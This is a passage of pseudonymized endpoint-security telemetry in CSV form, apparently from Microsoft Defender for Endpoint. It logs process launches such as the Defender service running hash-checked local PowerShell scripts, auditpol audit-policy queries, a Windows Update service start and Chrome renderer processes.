exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.322569900+00:00,2021-06-23 01:15:33.911101+00:00,bc55903d-6380-4d9d-871b-4bdb411949c6,computerpii_0a470890c60768167990033d701e7bd881398861,156825,False,10.7740.19041.1052,False,11540474045172155,,11540474045172205,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+442,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.316609300+00:00,20160,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9245-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.323496700+00:00,2021-06-23 01:15:33.911136300+00:00,5fd935ad-9857-4303-9ec1-5d5e29fd5926,computerpii_0a470890c60768167990033d701e7bd881398861,156826,False,10.7740.19041.1052,False,11540474045172155,,11540474045172206,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+443,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.334699100+00:00,12984,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce922f-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.347436300+00:00,2021-06-23 01:15:33.911203+00:00,754fe229-bed1-4d4a-9ac4-13abbc87814c,computerpii_0a470890c60768167990033d701e7bd881398861,156828,False,10.7740.19041.1052,False,11540474045172155,,11540474045172207,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+444,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.348532300+00:00,15712,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9230-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.365932+00:00,2021-06-23 01:15:33.911272200+00:00,e157263c-c4fd-4fef-a91b-ae49ce845be3,computerpii_0a470890c60768167990033d701e7bd881398861,156830,False,10.7740.19041.1052,False,11540474045172155,,11540474045172208,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+445,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.362575600+00:00,12224,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9231-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.367141500+00:00,2021-06-23 01:15:33.911305500+00:00,33befafb-555d-4bdd-b7d0-af5791f688ce,computerpii_0a470890c60768167990033d701e7bd881398861,156831,False,10.7740.19041.1052,False,11540474045172155,,11540474045172209,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+446,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.375923500+00:00,2444,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9232-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.388646500+00:00,2021-06-23 01:15:33.911379200+00:00,49a95094-d028-45f1-8ed7-90ba26ab2bce,computerpii_0a470890c60768167990033d701e7bd881398861,156833,True,10.7740.19041.1052,False,11540474045172155,,11540474045172210,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+447,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:55:12.013476700+00:00,11708,sc.exe,sc.exe start wuauserv,PortableExecutable,2019-12-07 09:09:34.006180900+00:00,C:\Windows\System32\sc.exe,72192,3fb5cf71f7e7eb49790cb0e663434d80,41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9,b4979a9f970029889713d756c3f123643dde73da,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:55:13.003447200+00:00,2021-06-24 09:55:45.460225100+00:00,33774d56-3cd7-4555-b533-aa119a956934,computerpii_0a470890c60768167990033d701e7bd881398861,178688,False,10.7740.19041.1052,False,11540474045136925,,11540474045177727,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,sc.exe,sc.exe,Service Control Manager Configuration Tool
+448,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:55:12.040862900+00:00,6696,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,3fb5cf71f7e7eb49790cb0e663434d80,41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9,b4979a9f970029889713d756c3f123643dde73da,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 09:55:12.013476700+00:00,11708,sc.exe,sc.exe start wuauserv,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:55:13.004144+00:00,2021-06-24 09:55:45.460264500+00:00,eb3b8231-6aad-4fef-8b97-d76fc2220b6a,computerpii_0a470890c60768167990033d701e7bd881398861,178689,False,10.7740.19041.1052,False,11540474045177727,,11540474045177728,2021-06-24 09:55:12.013476700+00:00,11708,2021-06-24 09:55:12.013476700+00:00,\Device\HarddiskVolume3\Windows\System32\sc.exe,11708,18560,TerminateProcessStartkey,C:\Windows\System32,72192,2064-01-25 04:43:49+00:00,2019-12-07 09:09:34.006180900+00:00,2021-06-24 09:55:12.052747800+00:00,2019-12-07 09:09:34.006180900+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,sc.exe,sc.exe,Service Control Manager Configuration Tool,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+449,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:23:17.592392900+00:00,18876,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9476 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:23:17.774194600+00:00,2021-06-24 03:25:40.719032+00:00,2515a9a0-4bf9-49b4-9278-729718254b38,computerpii_0a470890c60768167990033d701e7bd881398861,174270,False,10.7740.19041.1052,False,11540474045175164,,11540474045176245,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,16512,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+450,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:23:17.873040100+00:00,8648,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9580 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:23:18.777744200+00:00,2021-06-24 03:25:40.719200300+00:00,cc9a6574-1610-4dea-9edd-a756eca34901,computerpii_0a470890c60768167990033d701e7bd881398861,174272,False,10.7740.19041.1052,False,11540474045175164,,11540474045176246,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
